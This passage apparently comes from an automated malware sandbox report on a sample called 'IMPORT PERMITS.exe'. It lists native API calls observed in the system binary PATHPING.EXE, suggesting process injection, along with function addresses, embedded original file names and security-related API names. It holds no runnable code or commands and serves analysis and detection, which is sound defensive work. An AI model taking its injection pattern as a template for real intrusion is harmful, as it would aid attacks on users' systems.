                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D12CC0 NtQueryVirtualMemory,7_2_02D12CC0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D12CF0 NtOpenProcess,7_2_02D12CF0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D12C00 NtQueryInformationProcess,7_2_02D12C00
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D12DB0 NtEnumerateKey,7_2_02D12DB0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D12D00 NtSetInformationFile,7_2_02D12D00
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D13090 NtSetValueKey,7_2_02D13090
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D13010 NtOpenDirectoryObject,7_2_02D13010
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D13D70 NtOpenThread,7_2_02D13D70
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D13D10 NtOpenProcessToken,7_2_02D13D10
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_00428C00 NtCreateFile,7_2_00428C00
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_00428D70 NtReadFile,7_2_00428D70
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_00428E70 NtDeleteFile,7_2_00428E70
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_00428F20 NtClose,7_2_00428F20
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_00429090 NtAllocateVirtualMemory,7_2_00429090
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 0_2_0104D6840_2_0104D684
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 0_2_029356A00_2_029356A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 0_2_02933F680_2_02933F68
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 0_2_029300060_2_02930006
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 0_2_029300400_2_02930040
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 0_2_029304780_2_02930478
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 0_2_029325A80_2_029325A8
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 0_2_02931C800_2_02931C80
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_004183832_2_00418383
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_004028902_2_00402890
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_004031602_2_00403160
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0042E9832_2_0042E983
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_00402CC02_2_00402CC0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_004024F02_2_004024F0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0040FC8A2_2_0040FC8A
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0040FC932_2_0040FC93
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_004165C32_2_004165C3
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_004165BE2_2_004165BE
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0040FEB32_2_0040FEB3
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0040DF332_2_0040DF33
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014781582_2_01478158
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E01002_2_013E0100
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148A1182_2_0148A118
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014A81CC2_2_014A81CC
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B01AA2_2_014B01AA
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014A41A22_2_014A41A2
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014820002_2_01482000
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014AA3522_2_014AA352
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B03E62_2_014B03E6
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013FE3F02_2_013FE3F0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014902742_2_01490274
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014702C02_2_014702C0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F05352_2_013F0535
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B05912_2_014B0591
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014A24462_2_014A2446
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014944202_2_01494420
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0149E4F62_2_0149E4F6
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014147502_2_01414750
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F07702_2_013F0770
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EC7C02_2_013EC7C0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140C6E02_2_0140C6E0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014069622_2_01406962
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F29A02_2_013F29A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014BA9A62_2_014BA9A6
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013FA8402_2_013FA840
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F28402_2_013F2840
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013D68B82_2_013D68B8
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141E8F02_2_0141E8F0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014AAB402_2_014AAB40
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014A6BD72_2_014A6BD7
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EEA802_2_013EEA80
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013FAD002_2_013FAD00
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148CD1F2_2_0148CD1F
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EADE02_2_013EADE0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01408DBF2_2_01408DBF
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0C002_2_013F0C00
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E0CF22_2_013E0CF2
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01490CB52_2_01490CB5
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01464F402_2_01464F40
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01432F282_2_01432F28
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01410F302_2_01410F30
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01492F302_2_01492F30
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0146EFA02_2_0146EFA0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E2FC82_2_013E2FC8
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0E592_2_013F0E59
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014AEE262_2_014AEE26
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014AEEDB2_2_014AEEDB
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01402E902_2_01402E90
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014ACE932_2_014ACE93
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014BB16B2_2_014BB16B
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0142516C2_2_0142516C
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013DF1722_2_013DF172
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013FB1B02_2_013FB1B0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0149F0CC2_2_0149F0CC
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014A70E92_2_014A70E9
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014AF0E02_2_014AF0E0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F70C02_2_013F70C0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014A132D2_2_014A132D
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013DD34C2_2_013DD34C
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0143739A2_2_0143739A
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140B2C02_2_0140B2C0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F52A02_2_013F52A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014912ED2_2_014912ED
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140D2F02_2_0140D2F0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014A75712_2_014A7571
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B95C32_2_014B95C3
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148D5B02_2_0148D5B0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E14602_2_013E1460
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014AF43F2_2_014AF43F
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014AF7B02_2_014AF7B0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014356302_2_01435630
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014A16CC2_2_014A16CC
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140B9502_2_0140B950
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014859102_2_01485910
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F99502_2_013F9950
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0145D8002_2_0145D800
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F38E02_2_013F38E0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014AFB762_2_014AFB76
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01465BF02_2_01465BF0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0142DBF92_2_0142DBF9
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140FB802_2_0140FB80
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014AFA492_2_014AFA49
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014A7A462_2_014A7A46
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01463A6C2_2_01463A6C
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0149DAC62_2_0149DAC6
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01435AA02_2_01435AA0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148DAAC2_2_0148DAAC
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01491AA32_2_01491AA3
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014A1D5A2_2_014A1D5A
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014A7D732_2_014A7D73
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F3D402_2_013F3D40
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140FDC02_2_0140FDC0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01469C322_2_01469C32
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014AFCF22_2_014AFCF2
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014AFF092_2_014AFF09
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F1F922_2_013F1F92
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013B3FD22_2_013B3FD2
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013B3FD52_2_013B3FD5
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014AFFB12_2_014AFFB1
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F9EB02_2_013F9EB0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D602C07_2_02D602C0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D802747_2_02D80274
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02DA03E67_2_02DA03E6
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CEE3F07_2_02CEE3F0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D9A3527_2_02D9A352
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D720007_2_02D72000
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D981CC7_2_02D981CC
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02DA01AA7_2_02DA01AA
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D941A27_2_02D941A2
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D681587_2_02D68158
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CD01007_2_02CD0100
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D7A1187_2_02D7A118
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CFC6E07_2_02CFC6E0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CDC7C07_2_02CDC7C0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D047507_2_02D04750
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CE07707_2_02CE0770
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D8E4F67_2_02D8E4F6
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D924467_2_02D92446
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D844207_2_02D84420
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02DA05917_2_02DA0591
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CE05357_2_02CE0535
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CDEA807_2_02CDEA80
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D96BD77_2_02D96BD7
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D9AB407_2_02D9AB40
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D0E8F07_2_02D0E8F0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CC68B87_2_02CC68B8
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CE28407_2_02CE2840
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CEA8407_2_02CEA840
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CE29A07_2_02CE29A0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02DAA9A67_2_02DAA9A6
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CF69627_2_02CF6962
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D9EEDB7_2_02D9EEDB
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D9CE937_2_02D9CE93
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CF2E907_2_02CF2E90
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CE0E597_2_02CE0E59
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D9EE267_2_02D9EE26
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CD2FC87_2_02CD2FC8
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D5EFA07_2_02D5EFA0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D54F407_2_02D54F40
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D00F307_2_02D00F30
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D82F307_2_02D82F30
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D22F287_2_02D22F28
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CD0CF27_2_02CD0CF2
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D80CB57_2_02D80CB5
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CE0C007_2_02CE0C00
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CDADE07_2_02CDADE0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CF8DBF7_2_02CF8DBF
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D7CD1F7_2_02D7CD1F
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CEAD007_2_02CEAD00
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CFB2C07_2_02CFB2C0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D812ED7_2_02D812ED
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CFD2F07_2_02CFD2F0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CE52A07_2_02CE52A0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D2739A7_2_02D2739A
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CCD34C7_2_02CCD34C
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D9132D7_2_02D9132D
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CE70C07_2_02CE70C0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D8F0CC7_2_02D8F0CC
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D970E97_2_02D970E9
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D9F0E07_2_02D9F0E0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CEB1B07_2_02CEB1B0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02DAB16B7_2_02DAB16B
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D1516C7_2_02D1516C
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CCF1727_2_02CCF172
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D916CC7_2_02D916CC
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D256307_2_02D25630
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D9F7B07_2_02D9F7B0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CD14607_2_02CD1460
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D9F43F7_2_02D9F43F
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02DA95C37_2_02DA95C3
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D7D5B07_2_02D7D5B0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D975717_2_02D97571
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D8DAC67_2_02D8DAC6
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D25AA07_2_02D25AA0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D7DAAC7_2_02D7DAAC
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D81AA37_2_02D81AA3
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D9FA497_2_02D9FA49
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D97A467_2_02D97A46
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D53A6C7_2_02D53A6C
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D55BF07_2_02D55BF0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D1DBF97_2_02D1DBF9
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CFFB807_2_02CFFB80
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D9FB767_2_02D9FB76
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CE38E07_2_02CE38E0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D4D8007_2_02D4D800
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CE99507_2_02CE9950
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CFB9507_2_02CFB950
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D759107_2_02D75910
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CE9EB07_2_02CE9EB0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CA3FD27_2_02CA3FD2
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CA3FD57_2_02CA3FD5
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CE1F927_2_02CE1F92
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D9FFB17_2_02D9FFB1
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D9FF097_2_02D9FF09
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D9FCF27_2_02D9FCF2
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D59C327_2_02D59C32
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CFFDC07_2_02CFFDC0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D91D5A7_2_02D91D5A
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CE3D407_2_02CE3D40
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02D97D737_2_02D97D73
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_004119207_2_00411920
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0040C8677_2_0040C867
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0040C8707_2_0040C870
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0040CA907_2_0040CA90
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0040AB107_2_0040AB10
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_00414F607_2_00414F60
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0041319B7_2_0041319B
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_004131A07_2_004131A0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0042B5607_2_0042B560
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02B0E2287_2_02B0E228
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02B0E3447_2_02B0E344
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02B0E6DC7_2_02B0E6DC
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02B0D7A87_2_02B0D7A8
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02B0CA487_2_02B0CA48
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02B0C97B7_2_02B0C97B
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: String function: 01425130 appears 58 times
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: String function: 0146F290 appears 103 times
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: String function: 01437E54 appears 107 times
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: String function: 013DB970 appears 262 times
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: String function: 0145EA12 appears 86 times
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: String function: 02CCB970 appears 262 times
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: String function: 02D15130 appears 58 times
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: String function: 02D5F290 appears 103 times
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: String function: 02D4EA12 appears 86 times
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: String function: 02D27E54 appears 107 times
                Source: IMPORT PERMITS.exe, 00000000.00000000.1652444552.00000000006A0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameGPUK.exe6 vs IMPORT PERMITS.exe
                Source: IMPORT PERMITS.exe, 00000000.00000002.1770202165.000000000A140000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs IMPORT PERMITS.exe
                Source: IMPORT PERMITS.exe, 00000000.00000002.1755514077.00000000029E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs IMPORT PERMITS.exe
                Source: IMPORT PERMITS.exe, 00000000.00000002.1749679968.0000000000B4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs IMPORT PERMITS.exe
                Source: IMPORT PERMITS.exe, 00000002.00000002.2056786329.0000000000E88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepathping.exej% vs IMPORT PERMITS.exe
                Source: IMPORT PERMITS.exe, 00000002.00000002.2056786329.0000000000EA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepathping.exej% vs IMPORT PERMITS.exe
                Source: IMPORT PERMITS.exe, 00000002.00000002.2056962870.00000000014DD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs IMPORT PERMITS.exe
                Source: IMPORT PERMITS.exeBinary or memory string: OriginalFilenameGPUK.exe6 vs IMPORT PERMITS.exe
                Source: IMPORT PERMITS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: IMPORT PERMITS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, uJ2cQeL7dCfAKUv4kg.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.IMPORT PERMITS.exe.a140000.4.raw.unpack, SSO9hfyRu5sPNhP9Tv.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.IMPORT PERMITS.exe.a140000.4.raw.unpack, SSO9hfyRu5sPNhP9Tv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.IMPORT PERMITS.exe.a140000.4.raw.unpack, SSO9hfyRu5sPNhP9Tv.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.IMPORT PERMITS.exe.a140000.4.raw.unpack, uJ2cQeL7dCfAKUv4kg.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, SSO9hfyRu5sPNhP9Tv.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, SSO9hfyRu5sPNhP9Tv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
